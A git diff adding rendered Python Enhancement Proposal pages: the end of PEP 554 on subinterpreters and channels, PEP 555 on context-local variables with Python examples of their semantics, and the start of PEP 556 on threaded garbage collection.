It may be nice to re-use an existing subinterpreter instead of +spinning up a new one. Since an interpreter has substantially more +state than just the __main__ module, it isn’t so easy to put an +interpreter back into a pristine/fresh state. In fact, there may +be parts of the state that cannot be reset from Python code.

+

A possible solution is to add an Interpreter.reset() method. This +would put the interpreter back into the state it was in when newly +created. If called on a running interpreter it would fail (hence the +main interpreter could never be reset). This would likely be more +efficient than creating a new interpreter, though that depends on +what optimizations will be made later to interpreter creation.

+

While this would potentially provide functionality that is not +otherwise available from Python code, it isn’t a fundamental +functionality. So in the spirit of minimalism here, this can wait. +Regardless, I doubt it would be controversial to add it post-PEP.

+
+
+

Copy an existing interpreter’s state

+

Relatedly, it may be useful to support creating a new interpreter +based on an existing one, e.g. Interpreter.copy(). This ties +into the idea that a snapshot could be made of an interpreter’s memory, +which would make starting up CPython, or creating new interpreters, +faster in general. The same mechanism could be used for a +hypothetical Interpreter.reset(), as described previously.

+
+
+

Shareable file descriptors and sockets

+

Given that file descriptors and sockets are process-global resources, +making them shareable is a reasonable idea. They would be a good +candidate for the first effort at expanding the supported shareable +types. They aren’t strictly necessary for the initial API.

+
+
+

Integration with async

+

Per Antoine Pitrou [async]:

+
Has any thought been given to how FIFOs could integrate with async
+code driven by an event loop (e.g. asyncio)?  I think the model of
+executing several asyncio (or Tornado) applications each in their
+own subinterpreter may prove quite interesting to reconcile multi-
+core concurrency with ease of programming.  That would require the
+FIFOs to be able to synchronize on something an event loop can wait
+on (probably a file descriptor?).
+
+
+

The basic functionality of multiple interpreters support does not depend +on async and can be added later.

+

A possible solution is to provide async implementations of the blocking channel methods (recv() and send()).

+

Alternately, “readiness callbacks” could be used to simplify use in +async scenarios. This would mean adding an optional callback +(kw-only) parameter to the recv_nowait() and send_nowait() +channel methods. The callback would be called once the object was sent +or received (respectively).
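If that parameter were added, async integration might look roughly like this sketch (the callback parameter, and its exact behavior, are hypothetical):

import asyncio

async def recv_async(rch):
    loop = asyncio.get_running_loop()
    fut = loop.create_future()
    # Hypothetical: the callback fires once an object has been
    # received, possibly from another thread.
    rch.recv_nowait(
        callback=lambda obj: loop.call_soon_threadsafe(fut.set_result, obj))
    return await fut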

+

(Note that making channels buffered makes readiness callbacks less +important.)

+
+
+

Support for iteration

+

Supporting iteration on RecvChannel (via __iter__() or __next__()) may be useful. A trivial implementation would use the recv() method, similar to how files do iteration. Since this isn't a fundamental capability and has a simple analog, adding iteration support can wait until later.
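For illustration, a wrapper along those lines might look like this (the sentinel-based stop condition is an assumption, since the minimal API has no end-of-channel signal):

class IterRecv:
    """Hypothetical iteration wrapper over a RecvChannel."""

    _DONE = '<<done>>'  # sentinel both sides agree on (an assumption)

    def __init__(self, rch):
        self._rch = rch

    def __iter__(self):
        return self

    def __next__(self):
        obj = self._rch.recv()  # just call recv(), like file iteration
        if obj == self._DONE:
            raise StopIteration
        return obj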

+
+
+

Channel context managers

+

Context manager support on RecvChannel and SendChannel may be +helpful. The implementation would be simple, wrapping a call to +close() (or maybe release()) like files do. As with iteration, +this can wait.

+
+
+

Pipes and Queues

+

With the proposed object passing mechanism of “os.pipe()”, other similar +basic types aren’t strictly required to achieve the minimal useful +functionality of multiple interpreters. Such types include pipes +(like unbuffered channels, but one-to-one) and queues (like channels, +but more generic). See below in Rejected Ideas for more information.

+

Even though these types aren't part of this proposal, they may still be useful in the context of concurrency. Adding them later is entirely reasonable. They could be trivially implemented as wrappers around channels, as sketched below. Alternatively they could be implemented for efficiency at the same low level as channels.
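For example, a queue-style wrapper might look like this sketch (the ChannelQueue name and its method set are hypothetical):

import interpreters  # the proposed module

class ChannelQueue:
    """Hypothetical queue-style wrapper around a channel pair."""

    def __init__(self):
        self._rch, self._sch = interpreters.create_channel()

    def put(self, obj, *, timeout=None):
        self._sch.send(obj, timeout=timeout)

    def get(self, *, timeout=None):
        return self._rch.recv(timeout=timeout)

    def get_nowait(self, default=None):
        return self._rch.recv_nowait(default)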

+
+
+

Return a lock from send()

+

When sending an object through a channel, you don’t have a way of knowing +when the object gets received on the other end. One way to work around +this is to return a locked threading.Lock from SendChannel.send() +that unlocks once the object is received.

+

Alternately, the proposed SendChannel.send() (blocking) and +SendChannel.send_nowait() provide an explicit distinction that is +less likely to confuse users.

+

Note that returning a lock would matter for buffered channels +(i.e. queues). For unbuffered channels it is a non-issue.

+
+
+

Support prioritization in channels

+

A simple example is queue.PriorityQueue in the stdlib.

+
+
+

Support inheriting settings (and more?)

+

Folks might find it useful, when creating a new interpreter, to be +able to indicate that they would like some things “inherited” by the +new interpreter. The mechanism could be a strict copy or it could be +copy-on-write. The motivating example is with the warnings module +(e.g. copy the filters).

+

The feature isn’t critical, nor would it be widely useful, so it +can wait until there’s interest. Notably, both suggested solutions +will require significant work, especially when it comes to complex +objects and most especially for mutable containers of mutable +complex objects.

+
+
+

Make exceptions shareable

+

Exceptions are propagated out of interp.exec() calls, so it isn't a big leap to make them shareable. However, as noted elsewhere, it isn't essential (or particularly common), so we can wait on doing that.

+
+
+

Make everything shareable through serialization

+

We could use pickle (or marshal) to serialize everything and thus +make them shareable. Doing this is potentially inefficient, +but it may be a matter of convenience in the end. +We can add it later, but trying to remove it later +would be significantly more painful.

+
+
+

Make RunFailedError.__cause__ lazy

+

An uncaught exception in a subinterpreter (from interp.exec()) is +copied to the calling interpreter and set as __cause__ on a +RunFailedError which is then raised. That copying part involves +some sort of deserialization in the calling interpreter, which can be +expensive (e.g. due to imports) yet is not always necessary.

+

So it may be useful to use an ExceptionProxy type to wrap the serialized exception and only deserialize it when needed. That could be via ExceptionProxy.__getattribute__() or perhaps through RunFailedError.resolve() (which would raise the deserialized exception and set RunFailedError.__cause__ to the exception).

+

It may also make sense to have RunFailedError.__cause__ be a descriptor that does the lazy deserialization (and sets __cause__) on the RunFailedError instance.

+
+
+

Return a value from interp.exec()

+

Currently interp.exec() always returns None. One idea is to return +the return value from whatever the subinterpreter ran. However, for now +it doesn’t make sense. The only thing folks can run is a string of +code (i.e. a script). This is equivalent to PyRun_StringFlags(), +exec(), or a module body. None of those “return” anything. We can +revisit this once interp.exec() supports functions, etc.

+
+
+

Add a shareable synchronization primitive

+

This would be _threading.Lock (or something like it) where +interpreters would actually share the underlying mutex. The main +concern is that locks and isolated interpreters may not mix well +(as learned in Go).

+

We can add this later if it proves desirable without much trouble.

+
+
+

Propagate SystemExit and KeyboardInterrupt Differently

+

The exception types that inherit from BaseException (aside from +Exception) are usually treated specially. These types are: +KeyboardInterrupt, SystemExit, and GeneratorExit. It may +make sense to treat them specially when it comes to propagation from +interp.exec(). Here are some options:

+
* propagate like normal via RunFailedError
* do not propagate (handle them somehow in the subinterpreter)
* propagate them directly (avoid RunFailedError)
* propagate them directly (set RunFailedError as __cause__)
+
+
+

We aren’t going to worry about handling them differently. Threads +already ignore SystemExit, so for now we will follow that pattern.

+
+
+

Add an explicit release() and close() to channel end classes

+

It can be convenient to have an explicit way to close a channel against +further global use. Likewise it could be useful to have an explicit +way to release one of the channel ends relative to the current +interpreter. Among other reasons, such a mechanism is useful for +communicating overall state between interpreters without the extra +boilerplate that passing objects through a channel directly would +require.

+

The challenge is getting automatic release/close right without making +it hard to understand. This is especially true when dealing with a +non-empty channel. We should be able to get by without release/close +for now.

+
+
+

Add SendChannel.send_buffer()

+

This method would allow no-copy sending of an object through a channel +if it supports the PEP 3118 buffer protocol (e.g. memoryview).

+

Support for this is not fundamental to channels and can be added on +later without much disruption.

+
+
+

Auto-run in a thread

+

The PEP proposes a hard separation between subinterpreters and threads: +if you want to run in a thread you must create the thread yourself and +call interp.exec() in it. However, it might be convenient if +interp.exec() could do that for you, meaning there would be less +boilerplate.

+

Furthermore, we anticipate that users will want to run in a thread much +more often than not. So it would make sense to make this the default +behavior. We would add a kw-only param “threaded” (default True) +to interp.exec() to allow the run-in-the-current-thread operation.

+
+
+
+

Rejected Ideas

+
+

Explicit channel association

+

Interpreters are implicitly associated with channels upon recv() and +send() calls. They are de-associated with release() calls. The +alternative would be explicit methods. It would be either +add_channel() and remove_channel() methods on Interpreter +objects or something similar on channel objects.

+

In practice, this level of management shouldn’t be necessary for users. +So adding more explicit support would only add clutter to the API.

+
+
+

Add an API based on pipes

+

A pipe would be a simplex FIFO between exactly two interpreters. For +most use cases this would be sufficient. It could potentially simplify +the implementation as well. However, it isn’t a big step to supporting +a many-to-many simplex FIFO via channels. Also, with pipes the API +ends up being slightly more complicated, requiring naming the pipes.

+
+
+

Add an API based on queues

+

Queues and buffered channels are almost the same thing. The main +difference is that channels have a stronger relationship with context +(i.e. the associated interpreter).

+

The name “Channel” was used instead of “Queue” to avoid confusion with +the stdlib queue.Queue.

+
+
+

“enumerate”

+

The list_all() function provides the list of all interpreters. +In the threading module, which partly inspired the proposed API, the +function is called enumerate(). The name is different here to +avoid confusing Python users that are not already familiar with the +threading API. For them “enumerate” is rather unclear, whereas +“list_all” is clear.

+
+
+

Alternate solutions to prevent leaking exceptions across interpreters

+

In function calls, uncaught exceptions propagate to the calling frame. +The same approach could be taken with interp.exec(). However, this +would mean that exception objects would leak across the inter-interpreter +boundary. Likewise, the frames in the traceback would potentially leak.

+

While that might not be a problem currently, it would be a problem once +interpreters get better isolation relative to memory management (which +is necessary to stop sharing the GIL between interpreters). We’ve +resolved the semantics of how the exceptions propagate by raising a +RunFailedError instead, for which __cause__ wraps a safe proxy +for the original exception and traceback.

+

Rejected possible solutions:

+
  • reproduce the exception and traceback in the original interpreter and raise that
  • raise a subclass of RunFailedError that proxies the original exception and traceback
  • raise RuntimeError instead of RunFailedError
  • convert at the boundary (a la subprocess.CalledProcessError) (requires a cross-interpreter representation)
  • support customization via Interpreter.excepthook (requires a cross-interpreter representation)
  • wrap in a proxy at the boundary (including with support for something like err.raise() to propagate the traceback)
  • return the exception (or its proxy) from interp.exec() instead of raising it
  • return a result object (like subprocess does) [result-object] (unnecessary complexity?)
  • throw the exception away and expect users to deal with unhandled exceptions explicitly in the script they pass to interp.exec() (they can pass error info out via channels); with threads you have to do something similar
+
+

Always associate each new interpreter with its own thread

+

As implemented in the C-API, an interpreter is not inherently tied to +any thread. Furthermore, it will run in any existing thread, whether +created by Python or not. You only have to activate one of its thread +states (PyThreadState) in the thread first. This means that the +same thread may run more than one interpreter (though obviously +not at the same time).

+

The proposed module maintains this behavior. Interpreters are not +tied to threads. Only calls to Interpreter.exec() are. However, +one of the key objectives of this PEP is to provide a more +human-centric concurrency model. With that in mind, from a conceptual +standpoint the module might be easier to understand if each +interpreter were associated with its own thread.

+

That would mean interpreters.create() would create a new thread +and Interpreter.exec() would only execute in that thread (and +nothing else would). The benefit is that users would not have to +wrap Interpreter.exec() calls in a new threading.Thread. Nor +would they be in a position to accidentally pause the current +interpreter (in the current thread) while their interpreter +executes.

+

The idea is rejected because the benefit is small and the cost is high. +The difference from the capability in the C-API would be potentially +confusing. The implicit creation of threads is magical. The early +creation of threads is potentially wasteful. The inability to run +arbitrary interpreters in an existing thread would prevent some valid +use cases, frustrating users. Tying interpreters to threads would +require extra runtime modifications. It would also make the module’s +implementation overly complicated. Finally, it might not even make +the module easier to understand.

+
+
+

Only associate interpreters upon use

+

Associate interpreters with channel ends only once recv(), +send(), etc. are called.

+

Doing this is potentially confusing and also can lead to unexpected +races where a channel is auto-closed before it can be used in the +original (creating) interpreter.

+
+
+

Allow multiple simultaneous calls to Interpreter.exec()

+

This would make sense especially if Interpreter.exec() were to +manage new threads for you (which we’ve rejected). Essentially, +each call would run independently, which would be mostly fine +from a narrow technical standpoint, since each interpreter +can have multiple threads.

+

The problem is that the interpreter has only one __main__ module +and simultaneous Interpreter.exec() calls would have to sort out +sharing __main__ or we’d have to invent a new mechanism. Neither +would be simple enough to be worth doing.

+
+
+

Add a “reraise” method to RunFailedError

+

While having __cause__ set on RunFailedError helps produce a +more useful traceback, it’s less helpful when handling the original +error. To help facilitate this, we could add +RunFailedError.reraise(). This method would enable the following +pattern:

+
try:
+    try:
+        interp.exec(script)
+    except RunFailedError as exc:
+        exc.reraise()
+except MyException:
+    ...
+
+
+

This would be made even simpler if there existed a __reraise__ +protocol.

+

All that said, this is completely unnecessary. Using __cause__ +is good enough:

+
try:
+    try:
+        interp.exec(script)
+    except RunFailedError as exc:
+        raise exc.__cause__
+except MyException:
+    ...
+
+
+

Note that in extreme cases it may require a little extra boilerplate:

+
try:
+    try:
+        interp.exec(script)
+    except RunFailedError as exc:
+        if exc.__cause__ is not None:
+            raise exc.__cause__
+        raise  # re-raise
+except MyException:
+    ...
+
+
+
+
+
+

Implementation

+

The implementation of the PEP has 4 parts:

+
  • the high-level module described in this PEP (mostly a light wrapper around a low-level C extension)
  • the low-level C extension module
  • additions to the internal C-API needed by the low-level module
  • secondary fixes/changes in the CPython runtime that facilitate the low-level module (among other benefits)

These are at various levels of completion, with more done the lower +you go:

+
  • the high-level module has been, at best, roughly implemented. However, fully implementing it will be almost trivial.
  • the low-level module is mostly complete. The bulk of the implementation was merged into master in December 2018 as the "_xxsubinterpreters" module (for the sake of testing multiple interpreters functionality). Only the exception propagation implementation remains to be finished, which will not require extensive work.
  • all necessary C-API work has been finished
  • all anticipated work in the runtime has been finished

The implementation effort for PEP 554 is being tracked as part of +a larger project aimed at improving multi-core support in CPython. +[multi-core-project]

+
+
+

References

+
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0554.rst

+

Last modified: 2023-11-28 02:32:35 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0555/index.html b/pep-0555/index.html new file mode 100644 index 00000000000..9600052504c --- /dev/null +++ b/pep-0555/index.html @@ -0,0 +1,534 @@ + + + PEP 555 – Context-local variables (contextvars) | peps.python.org
+
+


+ + +
+
+
+

PEP 555 – Context-local variables (contextvars)

+
+
Author:
+
Koos Zevenhoven
+
Status:
+
Withdrawn
+
Type:
+
Standards Track
+
Created:
+
06-Sep-2017
+
Python-Version:
+
3.7
+
Post-History:
+
06-Sep-2017
+
+
+
+
+
+

Abstract

+

Sometimes, in special cases, it is desired that code can pass information down the function call chain to the callees without having to explicitly pass the information as arguments to each function in the call chain. This proposal describes a construct which allows code to explicitly switch in and out of a context where a certain context variable has a given value assigned to it. This is a modern alternative to some uses of things like global variables in traditional single-threaded (or thread-unsafe) code and of thread-local storage in traditional concurrency-unsafe code (single- or multi-threaded). In particular, the proposed mechanism can also be used with more modern concurrent execution mechanisms such as asynchronously executed coroutines, without the concurrently executed call chains interfering with each other’s contexts.

+

The “call chain” can consist of normal functions, awaited coroutines, or generators. The semantics of context variable scope are equivalent in all cases, allowing code to be refactored freely into subroutines (which here refers to functions, sub-generators or sub-coroutines) without affecting the semantics of context variables. Regarding implementation, this proposal aims at simplicity and minimum changes to the CPython interpreter and to other Python interpreters.

+
+
+

Rationale

+

Consider a modern Python call chain (or call tree), which in this proposal refers to any chained (nested) execution of subroutines, using any possible combinations of normal function calls, or expressions using await or yield from. In some cases, passing necessary information down the call chain as arguments can substantially complicate the required function signatures, or it can even be impossible to achieve in practice. In these cases, one may search for another place to store this information. Let us look at some historical examples.

+

The most naive option is to assign the value to a global variable or similar, where the code down the call chain can access it. However, this immediately makes the code thread-unsafe, because with multiple threads, all threads assign to the same global variable, and another thread can interfere at any point in the call chain. Sooner or later, someone will probably find a reason to run the same code in parallel threads.

+

A somewhat less naive option is to store the information as per-thread information in thread-local storage, where each thread has its own “copy” of the variable which other threads cannot interfere with. Although non-ideal, this has been the best solution in many cases. However, thanks to generators and coroutines, the execution of the call chain can be suspended and resumed, allowing code in other contexts to run concurrently. Therefore, using thread-local storage is concurrency-unsafe, because other call chains in other contexts may interfere with the thread-local variable.

+

Note that in the above two historical approaches, the stored information has the widest available scope without causing problems. For a third solution along the same path, one would first define an equivalent of a “thread” for asynchronous execution and concurrency. This could be seen as the largest amount of code and nested calls that is guaranteed to be executed sequentially without ambiguity in execution order. This might be referred to as concurrency-local or task-local storage. In this meaning of “task”, there is no ambiguity in the order of execution of the code within one task. (This concept of a task is close to equivalent to a Task in asyncio, but not exactly.) In such concurrency-locals, it is possible to pass information down the call chain to callees without another code path interfering with the value in the background.

+

Common to the above approaches is that they indeed use variables with a wide but just-narrow-enough scope. Thread-locals could also be called thread-wide globals—in single-threaded code, they are indeed truly global. And task-locals could be called task-wide globals, because tasks can be very big.

+

The issue here is that neither global variables, thread-locals nor task-locals are really meant to be used for this purpose of passing information of the execution context down the call chain. Instead of the widest possible variable scope, the scope of the variables should be controlled by the programmer, typically of a library, to have the desired scope—not wider. In other words, task-local variables (and globals and thread-locals) have nothing to do with the kind of context-bound information passing that this proposal intends to enable, even if task-locals can be used to emulate the desired semantics. Therefore, in the following, this proposal describes the semantics and the outlines of an implementation for context-local variables (or context variables, contextvars). In fact, as a side effect of this PEP, an async framework can use the proposed feature to implement task-local variables.

+
+
+

Proposal

+

Because the proposed semantics are not a direct extension to anything already available in Python, this proposal is first described in terms of semantics and API at a fairly high level. In particular, Python with statements are heavily used in the description, as they are a good match with the proposed semantics. However, the underlying __enter__ and __exit__ methods correspond to functions in the lower-level speed-optimized (C) API. For clarity of this document, the lower-level functions are not explicitly named in the definition of the semantics. After describing the semantics and high-level API, the implementation is described, going to a lower level.

+
+

Semantics and higher-level API

+
+

Core concept

+

A context-local variable is represented by a single instance of contextvars.Var, say cvar. Any code that has access to the cvar object can ask for its value with respect to the current context. In the high-level API, this value is given by the cvar.value property:

+
cvar = contextvars.Var(default="the default value",
+                       description="example context variable")
+
+assert cvar.value == "the default value"  # default still applies
+
+# In code examples, all ``assert`` statements should
+# succeed according to the proposed semantics.
+
+
+

No assignments to cvar have been applied for this context, so cvar.value gives the default value. Assigning new values to contextvars is done in a highly scope-aware manner:

+
with cvar.assign(new_value):
+    assert cvar.value is new_value
+    # Any code here, or down the call chain from here, sees:
+    #     cvar.value is new_value
+    # unless another value has been assigned in a
+    # nested context
+    assert cvar.value is new_value
+# the assignment of ``cvar`` to ``new_value`` is no longer visible
+assert cvar.value == "the default value"
+
+
+

Here, cvar.assign(value) returns another object, namely contextvars.Assignment(cvar, new_value). The essential part here is that applying a context variable assignment (Assignment.__enter__) is paired with a de-assignment (Assignment.__exit__). These operations set the bounds for the scope of the assigned value.

+

Assignments to the same context variable can be nested to override the outer assignment in a narrower context:

+
assert cvar.value == "the default value"
+with cvar.assign("outer"):
+    assert cvar.value == "outer"
+    with cvar.assign("inner"):
+        assert cvar.value == "inner"
+    assert cvar.value == "outer"
+assert cvar.value == "the default value"
+
+
+

Multiple variables can also be assigned in a nested manner without affecting each other:

+
cvar1 = contextvars.Var()
+cvar2 = contextvars.Var()
+
+assert cvar1.value is None # default is None by default
+assert cvar2.value is None
+
+with cvar1.assign(value1):
+    assert cvar1.value is value1
+    assert cvar2.value is None
+    with cvar2.assign(value2):
+        assert cvar1.value is value1
+        assert cvar2.value is value2
+    assert cvar1.value is value1
+    assert cvar2.value is None
+assert cvar1.value is None
+assert cvar2.value is None
+
+
+

Or with more convenient Python syntax:

+
with cvar1.assign(value1), cvar2.assign(value2):
+    assert cvar1.value is value1
+    assert cvar2.value is value2
+
+
+

In another context, in another thread or otherwise concurrently executed task or code path, the context variables can have a completely different state. The programmer thus only needs to worry about the context at hand.

+
+
+

Refactoring into subroutines

+

Code using contextvars can be refactored into subroutines without affecting the semantics. For instance:

+
assi = cvar.assign(new_value)
+def apply():
+    assi.__enter__()
+assert cvar.value == "the default value"
+apply()
+assert cvar.value is new_value
+assi.__exit__()
+assert cvar.value == "the default value"
+
+
+

Or similarly in an asynchronous context where await expressions are used. The subroutine can now be a coroutine:

+
assi = cvar.assign(new_value)
+async def apply():
+    assi.__enter__()
+assert cvar.value == "the default value"
+await apply()
+assert cvar.value is new_value
+assi.__exit__()
+assert cvar.value == "the default value"
+
+
+

Or when the subroutine is a generator:

+
def apply():
+    yield
+    assi.__enter__()
+
+
+

which is called using yield from apply() or with calls to next or .send. This is discussed further in later sections.

+
+
+

Semantics for generators and generator-based coroutines

+

Generators, coroutines and async generators act as subroutines in much the same way that normal functions do. However, they have the additional possibility of being suspended by yield expressions. Assignment contexts entered inside a generator are normally preserved across yields:

+
def genfunc():
+    with cvar.assign(new_value):
+        assert cvar.value is new_value
+        yield
+        assert cvar.value is new_value
+g = genfunc()
+next(g)
+assert cvar.value == "the default value"
+with cvar.assign(another_value):
+    next(g, None)  # the generator finishes here (StopIteration suppressed)
+
+
+

However, the outer context visible to the generator may change state across yields:

+
def genfunc():
+    assert cvar.value is value2
+    yield
+    assert cvar.value is value1
+    yield
+    with cvar.assign(value3):
+        assert cvar.value is value3
+
+with cvar.assign(value1):
+    g = genfunc()
+    with cvar.assign(value2):
+        next(g)
+    next(g)
+    next(g, None)  # the generator finishes here (StopIteration suppressed)
+    assert cvar.value is value1
+
+
+

Similar semantics apply to async generators (defined by async def ... yield ...).

+

By default, values assigned inside a generator do not leak through yields to the code that drives the generator. However, the assignment contexts entered and left open inside the generator do become visible outside the generator after the generator has finished with a StopIteration or another exception:

+
assi = cvar.assign(new_value)
+def genfunc():
+    yield
+    assi.__enter__()
+    yield
+
+g = genfunc()
+assert cvar.value == "the default value"
+next(g)
+assert cvar.value == "the default value"
+next(g)  # assi.__enter__() is called here
+assert cvar.value == "the default value"
+next(g, None)  # the generator finishes; the open assignment becomes visible
+assert cvar.value is new_value
+assi.__exit__()
+
+
+
+
+
+

Special functionality for framework authors

+

Frameworks, such as asyncio or third-party libraries, can use additional functionality in contextvars to achieve the desired semantics in cases which are not determined by the Python interpreter. Some of the semantics described in this section are also afterwards used to describe the internal implementation.

+
+

Leaking yields

+

Using the contextvars.leaking_yields decorator, one can choose to leak the context through yield expressions into the outer context that drives the generator:

+
@contextvars.leaking_yields
+def genfunc():
+    assert cvar.value == "outer"
+    with cvar.assign("inner"):
+        yield
+        assert cvar.value == "inner"
+    assert cvar.value == "outer"
+
+g = genfunc()
+with cvar.assign("outer"):
+    assert cvar.value == "outer"
+    next(g)
+    assert cvar.value == "inner"
+    next(g, None)  # the generator finishes here (StopIteration suppressed)
+    assert cvar.value == "outer"
+
+
+
+
+

Capturing contextvar assignments

+

Using contextvars.capture(), one can capture the assignment contexts that are entered by a block of code. The changes applied by the block of code can then be reverted and subsequently reapplied, even in another context:

+
assert cvar1.value is None # default
+assert cvar2.value is None # default
+assi1 = cvar1.assign(value1)
+assi2 = cvar1.assign(value2)
+with contextvars.capture() as delta:
+    assi1.__enter__()
+    with cvar2.assign("not captured"):
+        assert cvar2.value == "not captured"
+    assi2.__enter__()
+assert cvar1.value is value2
+delta.revert()
+assert cvar1.value is None
+assert cvar2.value is None
+...
+with cvar1.assign(1), cvar2.assign(2):
+    delta.reapply()
+    assert cvar1.value is value2
+    assert cvar2.value == 2
+
+
+

However, reapplying the “delta” if its net contents include deassignments may not be possible (see also Implementation and Open Issues).

+
+
+

Getting a snapshot of context state

+

The function contextvars.get_local_state() returns an object representing the applied assignments to all context-local variables in the context where the function is called. This can be seen as equivalent to using contextvars.capture() to capture all context changes from the beginning of execution. The returned object supports methods .revert() and .reapply() as above.

+
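
A hypothetical usage sketch, reusing the cvar variable from the earlier examples; the snapshot object behaves like a captured delta:

+
with cvar.assign("snapshotted"):
+    state = contextvars.get_local_state()  # snapshot of the applied assignments
+    state.revert()                         # temporarily undo them all
+    assert cvar.value == "the default value"
+    state.reapply()                        # and restore them
+    assert cvar.value == "snapshotted"
+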
+
+

Running code in a clean state

+

Although it is possible to revert all applied context changes using the above primitives, a more convenient way to run a block of code in a clean context is provided:

+
with contextvars.clean_context():
+    # here, all context vars start off with their default values
+# here, the state is back to what it was before the with block.
+
+
+
+
+
+

Implementation

+

This section describes, at a variable level of detail, how the described semantics can be implemented. At present, an implementation aimed at simplicity but with sufficient features is described. More details will be added later.

+

Alternatively, a somewhat more complicated implementation offers minor additional features while adding some performance overhead and requiring more code in the implementation.

+
+

Data structures and implementation of the core concept

+

Each thread of the Python interpreter keeps its own stack of contextvars.Assignment objects, each having a pointer to the previous (outer) assignment like in a linked list. The local state (also returned by contextvars.get_local_state()) then consists of a reference to the top of the stack and a pointer/weak reference to the bottom of the stack. This allows efficient stack manipulations. An object produced by contextvars.capture() is similar, but refers to only a part of the stack with the bottom reference pointing to the top of the stack as it was in the beginning of the capture block.

+

Now, the stack evolves according to the assignment __enter__ and __exit__ methods. For example:

+
cvar1 = contextvars.Var()
+cvar2 = contextvars.Var()
+# stack: []
+assert cvar1.value is None
+assert cvar2.value is None
+
+with cvar1.assign("outer"):
+    # stack: [Assignment(cvar1, "outer")]
+    assert cvar1.value == "outer"
+
+    with cvar1.assign("inner"):
+        # stack: [Assignment(cvar1, "outer"),
+        #         Assignment(cvar1, "inner")]
+        assert cvar1.value == "inner"
+
+        with cvar2.assign("hello"):
+            # stack: [Assignment(cvar1, "outer"),
+            #         Assignment(cvar1, "inner"),
+            #         Assignment(cvar2, "hello")]
+            assert cvar2.value == "hello"
+
+        # stack: [Assignment(cvar1, "outer"),
+        #         Assignment(cvar1, "inner")]
+        assert cvar1.value == "inner"
+        assert cvar2.value is None
+
+    # stack: [Assignment(cvar1, "outer")]
+    assert cvar1.value == "outer"
+
+# stack: []
+assert cvar1.value is None
+assert cvar2.value is None
+
+
+

Getting a value from the context using cvar1.value can be implemented as finding the topmost occurrence of a cvar1 assignment on the stack and returning the value there, or the default value if no assignment is found on the stack. However, this can be optimized to instead be an O(1) operation in most cases. Still, even searching through the stack may be reasonably fast since these stacks are not intended to grow very large.

+
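
As an illustration, the unoptimized lookup could look roughly like this sketch (var, value and default being the attributes assumed from the description above):

+
def lookup(stack, cvar):
+    # Search from the top of the stack for the most
+    # recent assignment of this variable.
+    for assignment in reversed(stack):
+        if assignment.var is cvar:
+            return assignment.value
+    # No assignment on the stack: fall back to the default.
+    return cvar.default
+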

The above description is already sufficient for implementing the core concept. Suspendable frames require some additional attention, as explained in the following.

+
+
+

Implementation of generator and coroutine semantics

+

Within generators, coroutines and async generators, assignments and deassignments are handled in exactly the same way as anywhere else. However, some changes are needed in the builtin generator methods send, __next__, throw and close. Here is the Python equivalent of the changes needed in send for a generator (here _old_send refers to the behavior in Python 3.6):

+
def send(self, value):
+    if self.gi_contextvars is LEAK:
+        # If decorated with contextvars.leaking_yields.
+        # Nothing needs to be done to leak context through yields :)
+        return self._old_send(value)
+    try:
+        with contextvars.capture() as delta:
+            if self.gi_contextvars:
+                # non-zero captured content from previous iteration
+                self.gi_contextvars.reapply()
+            ret = self._old_send(value)
+    except Exception:
+        raise  # back to the calling frame (e.g. StopIteration)
+    else:
+        # suspending, revert context changes but save them for later
+        delta.revert()
+        self.gi_contextvars = delta
+    return ret
+
+
+

The corresponding modifications to the other methods are essentially identical. The same applies to coroutines and async generators.

+

For code that does not use contextvars, the additions are O(1) and essentially reduce to a couple of pointer comparisons. For code that does use contextvars, the additions are still O(1) in most cases.

+
+
+

More on implementation

+

The rest of the functionality, including contextvars.leaking_yields, contextvars.capture(), contextvars.get_local_state() and contextvars.clean_context(), is in fact quite straightforward to implement, but the implementation will be discussed further in later versions of this proposal. Caching of assigned values is somewhat more complicated, and will be discussed later, but it seems that most cases should achieve O(1) complexity.

+
+
+
+
+

Backwards compatibility

+

There are no direct backwards-compatibility concerns, since a completely new feature is proposed.

+

However, various traditional uses of thread-local storage may need a smooth transition to contextvars so they can be concurrency-safe. There are several approaches to this, including emulating task-local storage with a little bit of help from async frameworks. A fully general implementation cannot be provided, because the desired semantics may depend on the design of the framework.

+

Another way to deal with the transition is for code to first look for a context created using contextvars. If that fails because a new-style context has not been set or because the code runs on an older Python version, a fallback to thread-local storage is used.

+
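
A rough sketch of such a fallback strategy (the helper name get_current and the single-variable layout are hypothetical):

+
import threading
+
+_tls = threading.local()
+
+try:
+    import contextvars  # the module proposed in this PEP
+    _cvar = contextvars.Var(default=None)
+except ImportError:
+    _cvar = None  # older Python: contextvars not available
+
+def get_current():
+    # Prefer a value set through a context variable; fall back
+    # to thread-local storage if none has been set.
+    if _cvar is not None and _cvar.value is not None:
+        return _cvar.value
+    return getattr(_tls, "value", None)
+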
+
+

Open Issues

+
+

Out-of-order de-assignments

+

In this proposal, all variable deassignments are made in the opposite order compared to the preceding assignments. This has two useful properties: it encourages using with statements to define assignment scope, and it tends to catch errors early (forgetting a .__exit__() call often results in a meaningful error). Requiring this is also beneficial in terms of implementation simplicity and performance. Nevertheless, allowing out-of-order context exits is not completely out of the question, and reasonable implementation strategies for that do exist.

+
+
+
+

Rejected Ideas

+
+

Dynamic scoping linked to subroutine scopes

+

The scope of value visibility should not be determined by the way the code is refactored into subroutines. It is necessary to have per-variable control of the assignment scope.

+
+
+
+

Acknowledgements

+

To be added.

+
+
+

References

+

To be added.

+
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0555.rst

+

Last modified: 2023-09-09 17:39:29 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0556/index.html new file mode 100644 index 00000000000..2d84645e67c --- /dev/null +++ b/pep-0556/index.html @@ -0,0 +1,567 @@ PEP 556 – Threaded garbage collection | peps.python.org
+
+


+ + +
+
+
+

PEP 556 – Threaded garbage collection

+
+
Author:
+
Antoine Pitrou <solipsis at pitrou.net>
+
Status:
+
Deferred
+
Type:
+
Standards Track
+
Created:
+
08-Sep-2017
+
Python-Version:
+
3.7
+
Post-History:
+
08-Sep-2017
+
+
+
+
+
+

Deferral Notice

+

This PEP is currently not being actively worked on. It may be revived +in the future. The main missing steps are:

+
    +
  • polish the implementation, adapting the test suite where necessary;
  • +
  • ensure setting threaded garbage collection does not disrupt existing +code in unexpected ways (expected impact includes lengthening the +lifetime of objects in reference cycles).
  • +
+
+
+

Abstract

+

This PEP proposes a new optional mode of operation for CPython’s cyclic +garbage collector (GC) where implicit (i.e. opportunistic) collections +happen in a dedicated thread rather than synchronously.

+
